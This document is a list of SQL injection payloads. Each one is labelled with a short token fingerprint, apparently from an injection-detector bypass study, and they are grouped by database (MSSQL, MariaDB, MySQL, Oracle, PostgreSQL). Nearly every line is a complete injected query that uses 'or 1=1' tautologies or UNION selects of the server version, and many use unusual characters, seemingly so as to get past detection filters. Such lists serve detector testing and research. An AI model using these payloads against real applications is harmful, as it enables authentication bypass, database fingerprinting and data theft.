s?UEs: select * from users where id=1 or 1#"? union select 'a',version() -- 1
s;os: select * from users where id=1 or ";%" or 1=1 -- 1
s?UEf: select * from users where id=1 or 1#"? union select version(),version() -- 1
sn?s: select * from users where id=1 or "$?" or 1=1 -- 1
s1ns: select * from users where id=1 or "1$" or 1=1 -- 1
s{;s: select * from users where id=1 or "{;" or 1=1 -- 1
sv?s: select * from users where id=1 or "@?" or 1=1 -- 1
s;UEf: select * from users where id=1 or 1#"; union select version(),version() -- 1
s).s: select * from users where id=1 or ")." or 1=1 -- 1
.ovUE: select * from users where id=1.%@ union select 1,version() -- 1
s?UE1: select * from users where id=1 or 1#"? union select 1,version() -- 1
ov&1c: select * from users where id=1 %@ or 1=1 -- 1
sonn&: select * from users where id='1' <@$_ or 1=1 -- 1'
s,)s: select * from users where id=1 or ",)" or 1=1 -- 1
s&vo.: select * from users where id='1' or @<@. union select 1,version() -- 1'
o(v)&: select * from users where id=1 %(@) or 1=1 -- 1
.&vUE: select * from users where id=1.&&@ union select 1,version() -- 1
s)ns: select * from users where id=1 or ")$" or 1=1 -- 1
svc: select * from users where id=1 or "@#" or 1=1 -- 1
&vo&1: select * from users where id=1 or @<@ or 1=1 -- 1
s{)s: select * from users where id=1 or "{)" or 1=1 -- 1
sv)s: select * from users where id=1 or "@)" or 1=1 -- 1
s{o1U: select * from users where id=1 or 1#"{=1 union select 1,version() -- 1
s1UE1: select * from users where id=1 or 1#"1 union select 1,version() -- 1
oo&1c: select * from users where id=1 <@<@ or 1=1 -- 1
o1n&1: select * from users where id=1 <@1$ or 1=1 -- 1
sn)s: select * from users where id=1 or "$)" or 1=1 -- 1
s{o1&: select * from users where id=1 or 1#"{=1 or 1=1 -- 1
s?os: select * from users where id=1 or "?%" or 1=1 -- 1
s1UEf: select * from users where id=1 or 1#"1 union select version(),version() -- 1
s1UEs: select * from users where id=1 or 1#"1 union select 'a',version() -- 1
&(v)&: select * from users where id=1 or (@) or 1=1 -- 1
s1os: select * from users where id=1 or "1%" or 1=1 -- 1
s1UEv: select * from users where id=1 or 1#"1 union select null,version() -- 1
s&voU: select * from users where id='1' or @<@ union select 1,version() -- 1'
.o1c: select * from users where id=1.<1# union select 1,version() -- 1

MSSQL specific

s&()o: select * from users where id='1' or (\)=1 union select 1,@@VERSION -- 1'
on1&1: select * from users where id=1 %$ 1 or 1=1 -- 1
sUE(.: select * from users where id='1' union select (\.),@@VERSION -- 1'
sUE(): select * from users where id='1' union select (\),@@VERSION -- 1'
o()UE: select * from users where id=1 *(\) union select null,@@VERSION -- 1
&no&1: select * from users where id=1 or $<\ or 1=1 -- 1
s&n1U: select * from users where id='1' or $ 1=1 union select 1,@@VERSION -- 1'
&oUEv: select * from users where id=1 or \<\ union select null,@@VERSION -- 1
&(nUE: select * from users where id=1 or ($+)=1 union select 1,@@VERSION -- 1
no)&1: select * from users where id=1 + ($+) or 1=1 -- 1
.)&1c: select * from users where id=1 + (\.) or 1=1 -- 1
&o.UE: select * from users where id=1 or \<\. union select 1,@@VERSION -- 1
s&n1&: select * from users where id='1' or $ 1=1 or 1=1 -- 1'
&oUE1: select * from users where id=1 or \<\ union select 1,@@VERSION -- 1
so()&: select * from users where id='1' *(\) or 1=1 -- 1'
&oo1U: select * from users where id=1 or \< =1 union select 1,@@VERSION -- 1
sUE,v: select * from users where id='1' union select \,@@VERSION -- 1'
sUE\c: select * from users where id='1' union select \#,@@VERSION -- 1'
&oo1&: select * from users where id=1 or \< =1 or 1=1 -- 1
so()U: select * from users where id='1' + (\) union select 1,@@VERSION -- 1'
so(.): select * from users where id='1' + (\.) union select 1,@@VERSION -- 1'
s&oo1: select * from users where id='1' or \< =1 union select 1,@@VERSION -- 1'
no.UE: select * from users where id=1 +$+. union select null,@@VERSION -- 1
&.oUE: select * from users where id=1 or \.<\ union select 1,@@VERSION -- 1
noo&1: select * from users where id=1 + $+%\ or 1=1 -- 1
soonU: select * from users where id='1' + $+*$ union select 1,@@VERSION -- 1'
&no.U: select * from users where id=1 or $<\. union select 1,@@VERSION -- 1
1oo&1: select * from users where id=1 + \+%\ or 1=1 -- 1
on1UE: select * from users where id=1 %$ 1 union select null,@@VERSION -- 1
n.&1c: select * from users where id=1 +$ . or 1=1 -- 1
noUEv: select * from users where id=1 +$+ union select null,@@VERSION -- 1
n.UEv: select * from users where id=1 +$ . union select null,@@VERSION -- 1
&(.)o: select * from users where id=1 or (\.)=1 union select 1,@@VERSION -- 1
soon&: select * from users where id='1' + $+%$ or 1=1 -- 1'
n1&1c: select * from users where id=1 +$ 1 or 1=1 -- 1
&no.&: select * from users where id=1 or $<\. or 1=1 -- 1
&o.&1: select * from users where id=1 or \<\. or 1=1 -- 1
.)UEv: select * from users where id=1 + (\.) union select null,@@VERSION -- 1
s&n.o: select * from users where id='1' or $ .=1 union select 1,@@VERSION -- 1'
nooUE: select * from users where id=1 + $+*\ union select null,@@VERSION -- 1
1oonU: select * from users where id=1 + \+*$ union select null,@@VERSION -- 1
noo1&: select * from users where id=1 + $+%1 or 1=1 -- 1
sUEo\: select * from users where id='1' union select +\#,@@VERSION -- 1'
noo1U: select * from users where id=1 + $+%1 union select null,@@VERSION -- 1
sUEo,: select * from users where id='1' union select +\,@@VERSION -- 1'
sUEo.: select * from users where id='1' union select +\.,@@VERSION -- 1'
no)UE: select * from users where id=1 + ($+) union select null,@@VERSION -- 1
1oon&: select * from users where id=1 + \+%$ or 1=1 -- 1
n1UEv: select * from users where id=1 +$ 1 union select null,@@VERSION -- 1
s&.o&: select * from users where id='1' or \.<\ or 1=1 -- 1'
s?,vc: select * from users where id='1' union select $["],@@VERSION -- 1'
&.o&1: select * from users where id=1 or \.<\ or 1=1 -- 1
s&.o1: select * from users where id='1' or \.<1 union select 1,@@VERSION -- 1'
s&.oU: select * from users where id='1' or \.<\ union select 1,@@VERSION -- 1'
noonU: select * from users where id=1 + $+*$ union select null,@@VERSION -- 1
s&.oo: select * from users where id='1' or \.< =1 union select 1,@@VERSION -- 1'
s&.on: select * from users where id='1' or \.<$ union select 1,@@VERSION -- 1'
&n1UE: select * from users where id=1 or $ 1=1 union select 1,@@VERSION -- 1
&n.o1: select * from users where id=1 or $ .=1 union select 1,@@VERSION -- 1
&.oo1: select * from users where id=1 or \.< =1 union select 1,@@VERSION -- 1
&onUE: select * from users where id=1 or \<$ union select 1,@@VERSION -- 1
no.&1: select * from users where id=1 +$+. or 1=1 -- 1
&()o1: select * from users where id=1 or (\)=1 union select 1,@@VERSION -- 1
sUE.c: select * from users where id='1' union select \.#,@@VERSION -- 1'
sUE.o: select * from users where id='1' union select \.%1,@@VERSION -- 1'
&noUE: select * from users where id=1 or $<\ union select 1,@@VERSION -- 1
sUE.,: select * from users where id='1' union select \.,@@VERSION -- 1'
&on&1: select * from users where id=1 or \<$ or 1=1 -- 1
&(1&1: select * from users where id=1 or (\+)=1 or 1=1 -- 1
on.UE: select * from users where id=1 *$ . union select null,@@VERSION -- 1
o()&1: select * from users where id=1 %(\) or 1=1 -- 1
s&(.): select * from users where id='1' or (\.)=1 union select 1,@@VERSION -- 1'
)UEvc: select * from users where id=1 +(\) union select null,@@VERSION -- 1
sUEn.: select * from users where id='1' union select $ .,@@VERSION -- 1'
&(n&1: select * from users where id=1 or ($+)=1 or 1=1 -- 1
&n1&1: select * from users where id=1 or $ 1=1 or 1=1 -- 1
sUEnn: select * from users where id='1' union select $ _,@@VERSION -- 1'
sUEnv: select * from users where id='1' union select $*$,@@VERSION -- 1'
no&1c: select * from users where id=1 +$+ or 1=1 -- 1
.UEvc: select * from users where id=1 +\. union select null,@@VERSION -- 1
noon&: select * from users where id=1 + $+%$ or 1=1 -- 1
1oo1&: select * from users where id=1 + \+%1 or 1=1 -- 1
1o)UE: select * from users where id=1 + (\+) union select null,@@VERSION -- 1
&.onU: select * from users where id=1 or \.<$ union select 1,@@VERSION -- 1
s&o.U: select * from users where id='1' or \<\. union select 1,@@VERSION -- 1'
1ooUE: select * from users where id=1 + \+*\ union select null,@@VERSION -- 1
1oo1U: select * from users where id=1 + \+%1 union select null,@@VERSION -- 1
&.on&: select * from users where id=1 or \.<$ or 1=1 -- 1
s&o.&: select * from users where id='1' or \<\. or 1=1 -- 1'
&1ooU: select * from users where id=1 or \+<\ union select 1,@@VERSION -- 1
&1oon: select * from users where id=1 or \+<$ union select 1,@@VERSION -- 1
son.&: select * from users where id='1' *$ . or 1=1 -- 1'
son.U: select * from users where id='1' + $ . union select 1,@@VERSION -- 1'
o(n)&: select * from users where id=1 %($) or 1=1 -- 1
&1oo&: select * from users where id=1 or \+<\ or 1=1 -- 1
&nooU: select * from users where id=1 or $+<\ union select 1,@@VERSION -- 1
)&1c: select * from users where id=1 +(\) or 1=1 -- 1
s&on&: select * from users where id='1' or \<$ or 1=1 -- 1'
&noon: select * from users where id=1 or $+<$ union select 1,@@VERSION -- 1
&(1UE: select * from users where id=1 or (\+)=1 union select 1,@@VERSION -- 1
s&onU: select * from users where id='1' or \<$ union select 1,@@VERSION -- 1'
son1&: select * from users where id='1' *$ 1 or 1=1 -- 1'
&noo1: select * from users where id=1 or $+<1 union select 1,@@VERSION -- 1
&noo&: select * from users where id=1 or $+<\ or 1=1 -- 1
s&noU: select * from users where id='1' or $<\ union select 1,@@VERSION -- 1'
&.o1&: select * from users where id=1 or \.<1 or 1=1 -- 1
s&noo: select * from users where id='1' or $+<$ union select 1,@@VERSION -- 1'
s&oUE: select * from users where id='1' or \<\ union select 1,@@VERSION -- 1'
&.o1U: select * from users where id=1 or \.<1 union select 1,@@VERSION -- 1
oUEvc: select * from users where id=1 *\ union select null,@@VERSION -- 1
s&no&: select * from users where id='1' or $<\ or 1=1 -- 1'
1o)&1: select * from users where id=1 + (\+) or 1=1 -- 1
s&no.: select * from users where id='1' or $<\. union select 1,@@VERSION -- 1'
on.&1: select * from users where id=1 %$ . or 1=1 -- 1

MariaDB specific

vc: select * from users where id=1 + @<1# union select 1,version() -- 1
voc: select * from users where id=1 + @<@# union select null,version() -- 1
&1ovc: select * from users where id=1 or 1&@#=1 union select 1,version() -- 1

MySQL specific

&ov&1: select * from users where id=1 or !<@ or 1=1 -- 1
UEoo1: select * from users where id=1 union select +!<1,version() -- 1
s&ov&: select * from users where id='1' or !<@ or 1=1 -- 1'
UEoov: select * from users where id=1 union select +!<@,version() -- 1
UEvf(: select * from users where id=1 union select @<@$,version() -- 1
vo.&1: select * from users where id=1 + @<@. or 1=1 -- 1
UEv11: select * from users where id=1 union select @ 1$,version() -- 1
sUEov: select * from users where id='1' union select !<@,version() -- 1'
UEvs: select * from users where id=1 union select @ $$,version() -- 1
s&ovU: select * from users where id='1' or !<@ union select 1,version() -- 1'
UE1o.: select * from users where id=1 union select 1<@.,version() -- 1
UEov,: select * from users where id=1 union select !<@,version() -- 1
&vo.&: select * from users where id=1 or @<@. or 1=1 -- 1
&ovUE: select * from users where id=1 or !<@ union select 1,version() -- 1
UEvo.: select * from users where id=1 union select @<@.,version() -- 1
UE111: select * from users where id=1 union select 1 1$,version() -- 1
UEo1,: select * from users where id=1 union select !<1,version() -- 1
UE1f(: select * from users where id=1 union select 1<@$,version() -- 1

Oracle specific

&1UE1: select * from users where id=1 ||1 union select 1,banner from v$version where rownum=1 -- 1
&1UEv: select * from users where id=1 ||1 union select null,banner from v$version where rownum=1 -- 1
UEvkn: select * from users where id=1   union select null,banner from v$version where rownum=1 -- 1
sUE1k: select * from users where id='1' union select 1,banner from v$version where rownum=1 -- 1'
sUE1n: select * from users where id='1' union select 1a,banner from v$version where rownum=1 -- 1'
1)UEv: select * from users where id=1 +(1) union select null,banner from v$version where rownum=1 -- 1
UE(1): select * from users where id=1 union select (1),banner from v$version where rownum=1 -- 1
.UEvk: select * from users where id=1. union select null,banner from v$version where rownum=1 -- 1
o1UEv: select * from users where id=1 *1 union select null,banner from v$version where rownum=1 -- 1
s&1oo: select * from users where id='1' or 1^=1 union select 1,banner from v$version where rownum=1 -- 1'
1&1UE: select * from users where id=11||1 union select 1,banner from v$version where rownum=1 -- 1
o1UE1: select * from users where id=1 *1 union select 1,banner from v$version where rownum=1 -- 1
sUE(1: select * from users where id='1' union select (1),banner from v$version where rownum=1 -- 1'
sUE1s: select * from users where id='1' union select 1"!",banner from v$version where rownum=1 -- 1'
s&1c: select * from users where id='1'   or 1=1 -- 1'
1UEvk: select * from users where id=1 +1 union select null,banner from v$version where rownum=1 -- 1
.UE1k: select * from users where id=1. union select 1,banner from v$version where rownum=1 -- 1
1)&1c: select * from users where id=1 +(1) or 1=1 -- 1
s&(1): select * from users where id='1' or (1)=1 union select 1,banner from v$version where rownum=1 -- 1'
&(1)o: select * from users where id=1 or (1)=1 union select 1,banner from v$version where rownum=1 -- 1
UE1kn: select * from users where id=1 union select 1,banner from v$version where rownum=1 -- 1
1&1c: select * from users where id=1 +1 or 1=1 -- 1
so1UE: select * from users where id='1' *1 union select 1,banner from v$version where rownum=1 -- 1'
UE1nk: select * from users where id=1 union select 1a,banner from v$version where rownum=1 -- 1
UE1nc: select * from users where id=1 union select 1a#,banner from v$version where rownum=1 -- 1
o(1)U: select * from users where id=1 *(1) union select 1,banner from v$version where rownum=1 -- 1
1UE1k: select * from users where id=1 +1 union select 1,banner from v$version where rownum=1 -- 1
so1&1: select * from users where id='1' + 1||1 union select 1,banner from v$version where rownum=1 -- 1'
1)UE1: select * from users where id=1 +(1) union select 1,banner from v$version where rownum=1 -- 1
so(1): select * from users where id='1' *(1) union select 1,banner from v$version where rownum=1 -- 1'
s&1UE: select * from users where id='1' ||1 union select 1,banner from v$version where rownum=1 -- 1'
sUEvk: select * from users where id='1'   union select null,banner from v$version where rownum=1 -- 1'

PostgreSQL specific

sUE&o: select * from users where id='1' union select ||/1,version() -- 1'
sov(1: select * from users where id='1' + @(1) union select 1,version() -- 1'
sov1o: select * from users where id='1' + @ 1! union select 1,version() -- 1'
s&&o1: select * from users where id='1' or ||/1=1 union select 1,version() -- 1'
sov1U: select * from users where id='1' + @ 1 union select 1,version() -- 1'
s&vvU: select * from users where id='1' or @ @1=1 union select 1,version() -- 1'
s&v1U: select * from users where id='1' or @ 1=1 union select 1,version() -- 1'
sovvU: select * from users where id='1' + @ @1 union select 1,version() -- 1'
s&v(1: select * from users where id='1' or @(1)=1 union select 1,version() -- 1'
sUEvv: select * from users where id='1' union select @ @1,version() --  1'

Related Articles